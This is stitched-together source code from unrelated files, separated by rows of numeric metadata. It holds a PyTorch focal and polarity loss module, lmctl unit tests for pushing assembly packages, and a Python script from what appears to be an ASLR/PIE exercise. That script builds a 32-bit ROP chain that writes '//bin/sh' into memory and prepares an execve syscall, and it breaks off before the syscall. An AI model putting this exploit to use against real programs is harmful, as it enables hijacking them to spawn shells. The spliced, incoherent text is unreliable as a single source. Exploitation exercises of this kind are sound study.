    # One-hot encode the labels in the prediction's dtype.
    one_hot = torch.zeros_like(pred)
    one_hot = one_hot.scatter(1, target.view(-1, 1), 1)
    target = one_hot.type_as(pred)
    # Smooth the one-hot targets toward the uniform distribution.
    target = target * label_smoothing + (1 - label_smoothing) / (target.shape[1])
    # pt: probability mass on the "wrong side" of each class slot.
    pt = (1 - pred_softmax) * target + pred_softmax * (1 - target)
    focal_weight = (alpha * target + (1 - alpha) *
                    (1 - target)) * pt.pow(gamma)
    loss = F.binary_cross_entropy_with_logits(
        pred, target, reduction='none') * focal_weight
    loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
    return loss
def polarity_loss(pred, target, weight=None, gamma=2.0,
                  alpha=0.25, beta=20, reduction='mean', avg_factor=None, ignore_index=None,
                  label_smoothing=1.0):
    """Focal loss with an additional sigmoid polarity penalty.

    The penalty down-weights class slots whose softmax probability is below
    the probability assigned to the true class (scaled by ``beta``).

    Args:
        pred: raw logits, assumed shape (N, C).
        target: integer class indices, shape (N,).
        weight: optional element weights forwarded to weight_reduce_loss.
        gamma: focusing exponent.
        alpha: positive/negative balancing factor.
        beta: sharpness of the polarity penalty's sigmoid.
        reduction: 'none' | 'mean' | 'sum'.
        avg_factor: optional normalizer used by weight_reduce_loss.
        ignore_index: label value whose samples are dropped before the loss.
        label_smoothing: smoothing factor for the one-hot targets.  The
            default 1.0 matches the original hard-coded value, which makes
            the smoothing step a no-op.
    """
    if ignore_index is not None:
        keep = target != ignore_index
        pred = pred[keep]
        target = target[keep]
    pred_softmax = F.softmax(pred, 1)
    one_hot = torch.zeros_like(pred)
    one_hot = one_hot.scatter(1, target.view(-1, 1), 1)
    target = one_hot.type_as(pred)
    target = target * label_smoothing + (1 - label_smoothing) / (target.shape[1])
    # torch.sigmoid replaces the deprecated F.sigmoid (same computation).
    penalty = torch.sigmoid(beta * (pred_softmax - torch.sum(pred_softmax * target, dim=1, keepdim=True)))
    pt = (1 - pred_softmax) * target + pred_softmax * (1 - target)
    focal_weight = (alpha * target + (1 - alpha) *
                    (1 - target)) * pt.pow(gamma)
    loss = F.binary_cross_entropy_with_logits(
        pred, target, reduction='none') * focal_weight * penalty
    loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
    return loss
@LOSSES.register_module()
class SoftmaxFocalLoss(nn.Module):
    """nn.Module wrapper around :func:`focal_loss` with a configurable
    reduction, global loss weight and ignore index."""

    def __init__(self, gamma=2.0, alpha=0.25, reduction='mean', loss_weight=1.0, ignore_index=None):
        super().__init__()
        self.reduction = reduction
        self.loss_weight = loss_weight
        self.gamma = gamma
        self.alpha = alpha
        self.ignore_index = ignore_index
        self.cls_criterion = focal_loss

    def forward(self,
                cls_score,
                label,
                weight=None,
                avg_factor=None,
                reduction_override=None,
                **kwargs):
        """Return the weighted focal loss; reduction_override, when given,
        takes precedence over the configured reduction."""
        assert reduction_override in (None, 'none', 'mean', 'sum')
        reduction = reduction_override or self.reduction
        loss = self.cls_criterion(
            cls_score,
            label,
            weight,
            ignore_index=self.ignore_index,
            reduction=reduction,
            avg_factor=avg_factor,
            **kwargs)
        return self.loss_weight * loss
@LOSSES.register_module()
class SoftmaxPolarityLoss(nn.Module):
    """nn.Module wrapper around :func:`polarity_loss` with a configurable
    reduction, global loss weight, polarity sharpness and ignore index."""

    def __init__(self, gamma=2.0, alpha=0.25, beta=20,
                 reduction='mean', loss_weight=1.0, ignore_index=None):
        super().__init__()
        self.reduction = reduction
        self.loss_weight = loss_weight
        self.gamma = gamma
        self.alpha = alpha
        self.beta = beta
        self.ignore_index = ignore_index
        self.cls_criterion = polarity_loss

    def forward(self,
                cls_score,
                label,
                weight=None,
                avg_factor=None,
                reduction_override=None,
                **kwargs):
        """Return the weighted polarity loss; reduction_override, when given,
        takes precedence over the configured reduction."""
        assert reduction_override in (None, 'none', 'mean', 'sum')
        reduction = reduction_override or self.reduction
        loss = self.cls_criterion(
            cls_score,
            label,
            weight,
            ignore_index=self.ignore_index,
            reduction=reduction,
            avg_factor=avg_factor,
            **kwargs)
        return self.loss_weight * loss
| 35.45082
| 100
| 0.621503
| 534
| 4,325
| 4.805243
| 0.168539
| 0.077163
| 0.010912
| 0.018706
| 0.830086
| 0.830086
| 0.830086
| 0.830086
| 0.798909
| 0.798909
| 0
| 0.01947
| 0.275607
| 4,325
| 121
| 101
| 35.743802
| 0.799553
| 0.016647
| 0
| 0.764706
| 0
| 0
| 0.010826
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 1
| 0.058824
| false
| 0
| 0.04902
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adbc6c1c5465760040672c2f7b24b36e7917bd46
| 25,794
|
py
|
Python
|
tests/unit/project_lifecycle/project/assemblytests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 3
|
2021-07-19T09:46:01.000Z
|
2022-03-07T13:51:25.000Z
|
tests/unit/project_lifecycle/project/assemblytests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 43
|
2019-08-27T12:36:29.000Z
|
2020-08-27T14:50:40.000Z
|
tests/unit/project_lifecycle/project/assemblytests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 7
|
2020-09-22T20:32:17.000Z
|
2022-03-29T12:25:51.000Z
|
import unittest
from unittest.mock import call
import os
import tests.common.simulations.project_lab as project_lab
from tests.common.project_testing import (ProjectSimTestCase, PROJECT_CONTAINS_DIR)
from lmctl.project.sessions import EnvironmentSessions
from lmctl.project.package.core import Pkg, PkgContent, PushOptions
from lmctl.project.handlers.assembly.assembly_src import TEMPLATE_CONTENT
# Expected descriptor-template YAML: the template name header, a newline,
# then the shared template body.
WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML = (
    "name: assembly-template::with_template::1.0" + "\n" + TEMPLATE_CONTENT
)
class TestPushAssemblyPkgs(ProjectSimTestCase):
def test_push_creates_descriptor(self):
pkg_sim = self.simlab.simulate_pkg_assembly_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_called_once_with('assembly::basic::1.0')
lm_session.descriptor_driver.create_descriptor.assert_called_once_with('name: assembly::basic::1.0\ndescription: basic_assembly\n')
def test_push_updates_descriptors_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_basic()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_descriptor('name: assembly::basic::1.0\ndescription: pre-update basic_assembly\n')
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_driver.get_descriptor.assert_called_once_with('assembly::basic::1.0')
lm_session.descriptor_driver.create_descriptor.assert_not_called()
lm_session.descriptor_driver.update_descriptor.assert_called_once_with('assembly::basic::1.0', 'name: assembly::basic::1.0\ndescription: basic_assembly\n')
def test_push_creates_descriptor_template(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_template()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_template_driver.get_descriptor_template.assert_called_once_with('assembly-template::with_template::1.0')
lm_session.descriptor_template_driver.create_descriptor_template.assert_called_once_with(WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML)
def test_push_updates_descriptors_template_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_template()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_descriptor_template('name: assembly-template::with_template::1.0\ndescription: pre-update\n')
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.descriptor_template_driver.get_descriptor_template.assert_called_once_with('assembly-template::with_template::1.0')
lm_session.descriptor_template_driver.create_descriptor_template.assert_not_called()
lm_session.descriptor_template_driver.update_descriptor_template.assert_called_once_with('assembly-template::with_template::1.0', WITH_TEMPLATE_ASSEMBLY_TEMPLATE_DESCRIPTOR_YAML)
def test_push_creates_behaviour_configuration(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_called_once_with({
"name": "simple",
"projectId": "assembly::with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "assembly::with_behaviour::1.0"
})
def test_push_updates_behaviour_configuration_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::with_behaviour::1.0', 'name': 'assembly::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_not_called()
lm_session.behaviour_driver.update_assembly_configuration.assert_called_once_with({
"id": "existing",
"name": "simple",
"projectId": "assembly::with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "assembly::with_behaviour::1.0"
})
def test_push_creates_behaviour_scenarios(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::with_behaviour::1.0', 'name': 'assembly::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_has_calls([
call({
"name": "runtime",
"projectId": "assembly::with_behaviour::1.0",
"description": "a runtime scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "ExistingProvidedAssembly",
"provided": True
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
}),
call({
"name": "test",
"projectId": "assembly::with_behaviour::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "existing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
})
])
def test_push_creates_scenario_with_missing_config(self):
pkg_sim = self.simlab.simulate_pkg_assembly_with_scenario_referencing_missing_config()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::with_scenario_referencing_missing_config::1.0', 'name': 'assembly::with_scenario_referencing_missing_config::1.0'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_called_once_with(
{
"name": "test",
"projectId": "assembly::with_scenario_referencing_missing_config::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "missing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
}
)
    def test_push_updates_behaviour_scenarios_if_exists(self):
        pkg_sim = self.simlab.simulate_pkg_assembly_with_behaviour()
        pkg = Pkg(pkg_sim.path)
        push_options = PushOptions()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_project({'id': 'assembly::with_behaviour::1.0', 'name': 'assembly::with_behaviour::1.0'})
        lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'simple'})
        # Scenarios with matching names already exist on the environment, so
        # push must update them (carrying the existing ids) rather than
        # create duplicates.
        lm_sim.add_scenario({'id': 'existingRuntime', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'runtime'})
        lm_sim.add_scenario({'id': 'existingTest', 'projectId': 'assembly::with_behaviour::1.0', 'name': 'test'})
        lm_session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(lm_session)
        result = pkg.push(env_sessions, push_options)
        self.assertIsInstance(result, PkgContent)
        lm_session.behaviour_driver.create_scenario.assert_not_called()
        lm_session.behaviour_driver.update_scenario.assert_has_calls([
            call({
                "id": "existingRuntime",
                "name": "runtime",
                "projectId": "assembly::with_behaviour::1.0",
                "description": "a runtime scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "ExistingProvidedAssembly",
                        "provided": True
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            }),
            call({
                "id": "existingTest",
                "name": "test",
                "projectId": "assembly::with_behaviour::1.0",
                "description": "a test scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "simple",
                        "assemblyConfigurationId": "existing",
                        "initialState": "Active",
                        "uninstallOnExit": True,
                        "provided": False
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            })
        ])
class TestPushAssemblyPkgsSubcontent(ProjectSimTestCase):
    """Push behaviour for an assembly package that nests a sub assembly
    package: the sub-content's descriptors, behaviour configurations and
    scenarios are pushed alongside the parent's (sub-content first)."""

    def test_push_creates_descriptor(self):
        # Both descriptors are looked up; being absent they are created,
        # sub-package descriptor before the parent's.
        pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_basic()
        pkg = Pkg(pkg_sim.path)
        push_options = PushOptions()
        lm_sim = self.simlab.simulate_lm()
        lm_session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(lm_session)
        result = pkg.push(env_sessions, push_options)
        self.assertIsInstance(result, PkgContent)
        lm_session.descriptor_driver.get_descriptor.assert_has_calls([call('assembly::sub_basic-contains_basic::1.0'), call('assembly::contains_basic::1.0')])
        lm_session.descriptor_driver.create_descriptor.assert_has_calls([
            call('name: assembly::sub_basic-contains_basic::1.0\ndescription: descriptor\n'),
            call('name: assembly::contains_basic::1.0\ndescription: basic_assembly\n')])

    def test_push_updates_descriptors_if_exists(self):
        # The sub-package descriptor is already on the environment, so it is
        # updated in place with the packaged content.
        pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_basic()
        pkg = Pkg(pkg_sim.path)
        push_options = PushOptions()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_descriptor('name: assembly::sub_basic-contains_basic::1.0\ndescription: pre-update\n')
        lm_session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(lm_session)
        result = pkg.push(env_sessions, push_options)
        self.assertIsInstance(result, PkgContent)
        lm_session.descriptor_driver.get_descriptor.assert_has_calls([call('assembly::sub_basic-contains_basic::1.0'), call('assembly::contains_basic::1.0')])
        lm_session.descriptor_driver.update_descriptor.assert_called_once_with('assembly::sub_basic-contains_basic::1.0', 'name: assembly::sub_basic-contains_basic::1.0\ndescription: descriptor\n')

    def test_push_creates_behaviour_configuration(self):
        # The sub-package's assembly configuration is created under the
        # sub-package's own project id.
        pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
        pkg = Pkg(pkg_sim.path)
        push_options = PushOptions()
        lm_sim = self.simlab.simulate_lm()
        lm_session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(lm_session)
        result = pkg.push(env_sessions, push_options)
        self.assertIsInstance(result, PkgContent)
        lm_session.behaviour_driver.create_assembly_configuration.assert_called_once_with({
            "name": "simple",
            "projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
            "description": "a simple assembly config",
            "properties": {
                "a": "123"
            },
            "createdAt": "2019-01-01T01:00:00.613Z",
            "lastModifiedAt": "2019-01-02T01:00:00.613Z",
            "descriptorName": "assembly::sub_with_behaviour-contains_with_behaviour::1.0"
        })

    def test_push_updates_behaviour_configuration_if_exists(self):
        # A configuration with the same name exists, so push updates it
        # (keeping its id) instead of creating a new one.
        pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
        pkg = Pkg(pkg_sim.path)
        push_options = PushOptions()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_project({'id': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0'})
        lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'simple'})
        lm_session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(lm_session)
        result = pkg.push(env_sessions, push_options)
        self.assertIsInstance(result, PkgContent)
        lm_session.behaviour_driver.create_assembly_configuration.assert_not_called()
        lm_session.behaviour_driver.update_assembly_configuration.assert_called_once_with({
            "id": "existing",
            "name": "simple",
            "projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
            "description": "a simple assembly config",
            "properties": {
                "a": "123"
            },
            "createdAt": "2019-01-01T01:00:00.613Z",
            "lastModifiedAt": "2019-01-02T01:00:00.613Z",
            "descriptorName": "assembly::sub_with_behaviour-contains_with_behaviour::1.0"
        })

    def test_push_creates_behaviour_scenarios(self):
        # Both packaged scenarios ("runtime" and "test") are created; the
        # "test" actor resolves its configuration to the existing id.
        pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
        pkg = Pkg(pkg_sim.path)
        push_options = PushOptions()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_project({'id': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0'})
        lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'simple'})
        lm_session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(lm_session)
        result = pkg.push(env_sessions, push_options)
        self.assertIsInstance(result, PkgContent)
        lm_session.behaviour_driver.create_scenario.assert_has_calls([
            call({
                "name": "runtime",
                "projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
                "description": "a runtime scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "ExistingProvidedAssembly",
                        "provided": True
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            }),
            call({
                "name": "test",
                "projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
                "description": "a test scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "simple",
                        "assemblyConfigurationId": "existing",
                        "initialState": "Active",
                        "uninstallOnExit": True,
                        "provided": False
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            })
        ])

    def test_push_updates_behaviour_scenarios_if_exists(self):
        # Scenarios with matching names already exist, so push updates them
        # (carrying the existing ids) and creates nothing.
        pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
        pkg = Pkg(pkg_sim.path)
        push_options = PushOptions()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_project({'id': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0'})
        lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'simple'})
        lm_sim.add_scenario({'id': 'existingRuntime', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'runtime'})
        lm_sim.add_scenario({'id': 'existingTest', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'test'})
        lm_session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(lm_session)
        result = pkg.push(env_sessions, push_options)
        self.assertIsInstance(result, PkgContent)
        lm_session.behaviour_driver.create_scenario.assert_not_called()
        lm_session.behaviour_driver.update_scenario.assert_has_calls([
            call({
                "id": "existingRuntime",
                "name": "runtime",
                "projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
                "description": "a runtime scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "ExistingProvidedAssembly",
                        "provided": True
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            }),
            call({
                "id": "existingTest",
                "name": "test",
                "projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
                "description": "a test scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "simple",
                        "assemblyConfigurationId": "existing",
                        "initialState": "Active",
                        "uninstallOnExit": True,
                        "provided": False
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            })
        ])
class TestPushOldStyle(ProjectSimTestCase):
    """Pushing an old-style assembly package onboards its contained CSARs
    through the resource-manager (ARM) session registered on the LM."""

    def test_push(self):
        package_sim = self.simlab.simulate_pkg_assembly_old_style()
        package = Pkg(package_sim.path)
        options = PushOptions()
        arm_session = self.simlab.simulate_arm().as_mocked_session()
        lm_sim = self.simlab.simulate_lm()
        # Register the ARM as a known resource manager on the simulated LM.
        lm_sim.add_rm({'name': arm_session.env.name, 'url': arm_session.env.address})
        env_sessions = EnvironmentSessions(lm_sim.as_mocked_session(), arm_session)
        result = package.push(env_sessions, options)
        self.assertIsInstance(result, PkgContent)
        contains_dir = os.path.join(result.tree.root_path, PROJECT_CONTAINS_DIR)
        expected_onboards = [
            call('vnfcA', '1.0', os.path.join(contains_dir, 'vnfcA', 'vnfcA.csar')),
            call('vnfcB', '2.0', os.path.join(contains_dir, 'vnfcB', 'vnfcB.csar')),
        ]
        arm_session.arm_driver.onboard_type.assert_has_calls(expected_onboards)
| 47.32844
| 197
| 0.562922
| 2,424
| 25,794
| 5.675743
| 0.057343
| 0.061419
| 0.038668
| 0.04143
| 0.94316
| 0.934002
| 0.919828
| 0.91554
| 0.90093
| 0.889519
| 0
| 0.034311
| 0.3243
| 25,794
| 544
| 198
| 47.415441
| 0.755063
| 0
| 0
| 0.756705
| 0
| 0
| 0.253276
| 0.136427
| 0
| 0
| 0
| 0
| 0.084291
| 1
| 0.030651
| false
| 0
| 0.015326
| 0
| 0.051724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adc7c7897eb6b1071394052c241a9705154b6830
| 2,293
|
py
|
Python
|
2. ASLR & PIE/exploit_21.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
2. ASLR & PIE/exploit_21.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
2. ASLR & PIE/exploit_21.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | 1
|
2021-05-27T22:04:35.000Z
|
2021-05-27T22:04:35.000Z
|
#!/usr/bin/env python3
# Generated by ropper ropchain generator #
"""execve('//bin/sh') ROP chain for a 32-bit x86 binary.

Ported from Python 2: the chain is assembled as ``bytes`` and written to
``sys.stdout.buffer`` so the raw payload is emitted unmangled on Python 3
(``print`` on a text stream would re-encode the gadget addresses).
"""
import sys
from struct import pack


def p(value):
    """Pack *value* as an explicit little-endian 32-bit word (x86)."""
    # '<I' fixes byte order and size; the original native 'I' only worked
    # because the generating host happened to be little-endian with 4-byte
    # ints — not portable.
    return pack('<I', value)


IMAGE_BASE_0 = 0x08048000  # c7fd8b0f7cb07554b7f8e67b396605fa8c500b11beb0fb80ec3e797bfd8338ec


def rebase_0(offset):
    """Return the packed absolute address of *offset* inside the image."""
    return p(offset + IMAGE_BASE_0)


rop = b'a' * 28  # padding up to the saved return address
# Stage 1: write "//bi" then "n/sh" into writable memory at image+0x9b060,
# and a NUL terminator dword at image+0x9b068.
rop += rebase_0(0x00001743)  # 0x08049743: pop edi; ret;
rop += b'//bi'
rop += rebase_0(0x0000101e)  # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009b060)
rop += rebase_0(0x000462fd)  # 0x0808e2fd: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00001743)  # 0x08049743: pop edi; ret;
rop += b'n/sh'
rop += rebase_0(0x0000101e)  # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009b064)
rop += rebase_0(0x000462fd)  # 0x0808e2fd: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00007920)  # 0x0804f920: xor eax, eax; ret;
rop += rebase_0(0x0001d55e)  # 0x0806555e: pop edx; pop ebx; pop esi; ret;
rop += rebase_0(0x0009b068)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00016f1a)  # 0x0805ef1a: mov dword ptr [edx], eax; ret;
# Stage 2: set up ebx/ecx/edx for the syscall.
rop += rebase_0(0x0000101e)  # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009b060)
rop += rebase_0(0x0001b741)  # 0x08063741: pop ecx; add al, 0xf6; ret;
rop += rebase_0(0x0009b068)
rop += rebase_0(0x0004fa45)  # 0x08097a45: pop edx; xor eax, eax; pop edi; ret;
rop += rebase_0(0x0009b068)
rop += p(0xdeadbeef)
# Stage 3: eax = 11 (execve) built from repeated increments, then trap.
rop += rebase_0(0x00007920)  # 0x0804f920: xor eax, eax; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
